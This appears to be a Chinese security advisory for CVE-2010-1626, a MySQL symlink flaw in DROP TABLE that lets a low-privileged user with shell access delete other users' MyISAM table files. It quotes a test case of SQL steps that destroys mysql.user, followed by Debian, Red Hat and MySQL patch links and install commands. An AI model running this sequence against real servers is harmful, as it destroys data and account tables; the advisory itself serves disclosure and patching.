安全研究
安全漏洞
MySQL DROP TABLE命令符号链接攻击漏洞
发布日期:2010-04-06
更新日期:2010-05-27
受影响系统:
MySQL AB MySQL < 5.1.46不受影响系统:
MySQL AB MySQL 5.1.46描述:
BUGTRAQ ID: 40257
CVE(CAN) ID: CVE-2010-1626
MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
MySQL处理使用CREATE TABLE语句的DATA DIRECTORY和INDEX DIRECTORY指令所创建表格的符号链接的方式存在漏洞,拥有CREATE和DROP表格权限且可以shell访问数据库服务器的用户可以利用这个漏洞删除其他数据库用户使用MyISAM存储引擎所创建表格的数据和索引文件。
<*来源:Ingo Strüwing (ingo@mysql.com)
链接:http://bugs.mysql.com/bug.php?id=40980
http://secunia.com/advisories/39454/
https://www.redhat.com/support/errata/RHSA-2010-0442.html
http://www.debian.org/security/2010/dsa-2057
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Test #2 - Drop mysql.user with CREATE|DROP privileges on another DB.
#
CREATE USER 'mysql_user1';
#
# Create a database for mysql_user1 user's tables.
#
CREATE DATABASE mysql_db1;
#
# Grant mysql_user1 to create and drop tables in mysql_db1.
#
GRANT CREATE, DROP ON mysql_db1.* TO 'mysql_user1';
#
# Show which users we have in the table mysql.user.
#
SELECT User FROM mysql.user;
User
mysql_user1
root
root
root
#
# Connection con1 - mysql_user1
#
# Make a directory somewhere, for example in MYSQL_TMP_DIR.
#
# Create table mysql_db1.user, with its files in.
#
CREATE TABLE mysql_db1.user (c1 INT) ENGINE=MyISAM
DATA DIRECTORY='MYSQL_TMP_DIR/bug39277'
INDEX DIRECTORY='MYSQL_TMP_DIR/bug39277';
#
# Remove the table files and the directory.
#
# Make a symlink from 'mysql' database to MYSQL_TMP_DIR/.
#
# Drop table mysql_db1.mysql with the files from mysql.user.
DROP TABLE mysql_db1.user;
#
# Connection default - root
#
# Show which users we have in table mysql.user.
# This does work as the table is still open in the table cache.
#
SELECT User FROM mysql.user;
User
mysql_user1
root
root
root
#
# Close table mysql.user.
#
FLUSH TABLE mysql.user;
#
# Show which users we have in the table mysql.user. Bummer!
#
SELECT User FROM mysql.user;
ERROR HY000: Can't find file: 'user' (errno: 2)
#
# Due to missing table files, we cannot drop the user any more.
#
DROP USER 'mysql_user1';
ERROR HY000: Can't find file: 'user' (errno: 2)
#
# Cleanup.
#
DROP DATABASE mysql_db1;
建议:
厂商补丁:
Debian
------
Debian已经为此发布了一个安全公告(DSA-2057-1)以及相应补丁:
DSA-2057-1:mysql-dfsg-5.0: Multiple vulnerabilities
链接:http://www.debian.org/security/2010/dsa-2057
补丁下载:
Source archives:
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a-24+lenny4.diff.gz
Size/MD5 checksum: 382688 98904282d9b1ba07a5fa441695c9cefd
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a-24+lenny4.dsc
Size/MD5 checksum: 1746 213d7a9655000a669a9262b68a645b84
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a.orig.tar.gz
Size/MD5 checksum: 17946664 6fae978908ad5eb790fa3f24f16dadba
Architecture independent packages:
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.51a-24+lenny4_all.deb
Size/MD5 checksum: 53012 7b2c03b1e86bb4634bb65b7fd65a8ce0
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.51a-24+lenny4_all.deb
Size/MD5 checksum: 55208 0059173c20f96569e532f34e8d8e6d3d
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.51a-24+lenny4_all.deb
Size/MD5 checksum: 61784 165889f524b9cd317462910f34871652
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_alpha.deb
Size/MD5 checksum: 9069806 dbf1efe0f87962a0ce24c3c2026f08fe
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_alpha.deb
Size/MD5 checksum: 8921072 4109cdb9b571b8384e22990f049077e5
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_alpha.deb
Size/MD5 checksum: 28367370 1f7b2cbe390dc19230b83aac2b427a1c
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_alpha.deb
Size/MD5 checksum: 2017406 121ad24e4ef9408540b34f4c954ea03a
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_amd64.deb
Size/MD5 checksum: 7586258 dbffd3dcb28daa3070b68f0ee268d6b3
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_amd64.deb
Size/MD5 checksum: 27296900 030ee9c14fbb373617e77158fb56c40f
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_amd64.deb
Size/MD5 checksum: 8207020 233dde7fe1c8d16757862037b7f8c551
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_amd64.deb
Size/MD5 checksum: 1905200 8296b7de029b8208828981d151ad7013
arm architecture (ARM)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_arm.deb
Size/MD5 checksum: 26227842 f2e1a010442bd1b007aa1b12192e507c
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_arm.deb
Size/MD5 checksum: 7158596 b06eb5f03ef7cbc2bdbda36d5f286411
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_arm.deb
Size/MD5 checksum: 7614948 a3e30a83a7a314001445b0dd39415516
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_arm.deb
Size/MD5 checksum: 1779078 69f97725b1aa16018a8b59e3f3723568
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_armel.deb
Size/MD5 checksum: 7261064 5526963b33325b3d6dec386f203ef4c3
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_armel.deb
Size/MD5 checksum: 26225224 7ac517f02119cb0d7f9d1dd27d863a0b
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_armel.deb
Size/MD5 checksum: 7650776 41fd6ce03ecbad3ebc876a145a440bc9
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_armel.deb
Size/MD5 checksum: 1782498 8c8ffcec7cfcf2deaa622bbd3bd3e890
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_hppa.deb
Size/MD5 checksum: 8435372 3685c8fbee92cc421e2636956caf726a
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_hppa.deb
Size/MD5 checksum: 1958982 3951104d822d5231b6bcc726bd3f538c
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_hppa.deb
Size/MD5 checksum: 27898560 9fbee7a1ac008f5229bc1b6063461d8e
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_hppa.deb
Size/MD5 checksum: 8176082 91f0424391f249a6d3f86bd7adfa9bfb
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_i386.deb
Size/MD5 checksum: 7201148 dec28c17afdfbc427b03b3dc7b16ae80
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_i386.deb
Size/MD5 checksum: 1860698 fa79c4525944c5fc2938838697991d2a
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_i386.deb
Size/MD5 checksum: 7785564 59607135a3509e3bdf5aacbe0f7b9e27
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_i386.deb
Size/MD5 checksum: 26655616 660b2d3f55af9a0ffff5dec3ccb265b2
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_ia64.deb
Size/MD5 checksum: 2186514 3643a5fd53f47e6b37a657c2b985de5d
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_ia64.deb
Size/MD5 checksum: 31432404 302295754438d88e1f29543d92cabfee
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_ia64.deb
Size/MD5 checksum: 10914492 012586f98c3ef1f59105f7252abae54e
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_ia64.deb
Size/MD5 checksum: 9934262 52aaca8c884acb288570c7187dc80fe6
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_mips.deb
Size/MD5 checksum: 7886638 3674f662a26dee543e841dbc1aa90001
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_mips.deb
Size/MD5 checksum: 26949468 c16b353714abef0109c31f24cd95157a
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_mips.deb
Size/MD5 checksum: 1857996 19eb0e571e285ed370ff048a86c180de
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_mips.deb
Size/MD5 checksum: 7852966 ad5ceec59cd351e9643f3fe7815899e4
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_mipsel.deb
Size/MD5 checksum: 7778208 efd2025f639ba1f75601692d1f773482
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_mipsel.deb
Size/MD5 checksum: 26454824 8c5c4d499e98a454d994a9799f867235
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_mipsel.deb
Size/MD5 checksum: 1818040 983d9f0b274554af24895a9bf9da2d58
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_mipsel.deb
Size/MD5 checksum: 7724872 2afe270ee53d403ff3d1b5e1449fb6cf
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_powerpc.deb
Size/MD5 checksum: 1917272 3e0cd81b4034a0572a04f0825f63539f
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_powerpc.deb
Size/MD5 checksum: 27147186 a29b658c4a423ade01f38d383d8990bb
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_powerpc.deb
Size/MD5 checksum: 8155688 cf97ff51341b672a192b29fb196a33d8
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_powerpc.deb
Size/MD5 checksum: 7606414 a5ff20347ea77cba2e1f9775462b4e3b
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_s390.deb
Size/MD5 checksum: 28243518 d76d51037f58b1a4d55e2721b6b524dd
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_s390.deb
Size/MD5 checksum: 7703306 7ded6daec5c06279f46e9e077f972fc2
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_s390.deb
Size/MD5 checksum: 2032080 df093a3278065afc3623d993760142b5
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_s390.deb
Size/MD5 checksum: 8238026 4121d28d8ee97640c82faf40745d64fb
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny4_sparc.deb
Size/MD5 checksum: 26847970 562cd268e46900380d05e83d48e7f854
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny4_sparc.deb
Size/MD5 checksum: 7758418 446a2a74ca3c548d3fe9286c7534ca25
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny4_sparc.deb
Size/MD5 checksum: 1872840 2ea462a86056196ca11bf08a700f461a
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny4_sparc.deb
Size/MD5 checksum: 7144452 8bb91966144e610e56f1480f23c6d47a
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
MySQL AB
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://lists.mysql.com/commits/104639?f=plain
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2010:0442-01)以及相应补丁:
RHSA-2010:0442-01:Important: mysql security update
链接:https://www.redhat.com/support/errata/RHSA-2010-0442.html
浏览次数:5582
严重程度:0(网友投票)
绿盟科技给您安全的保障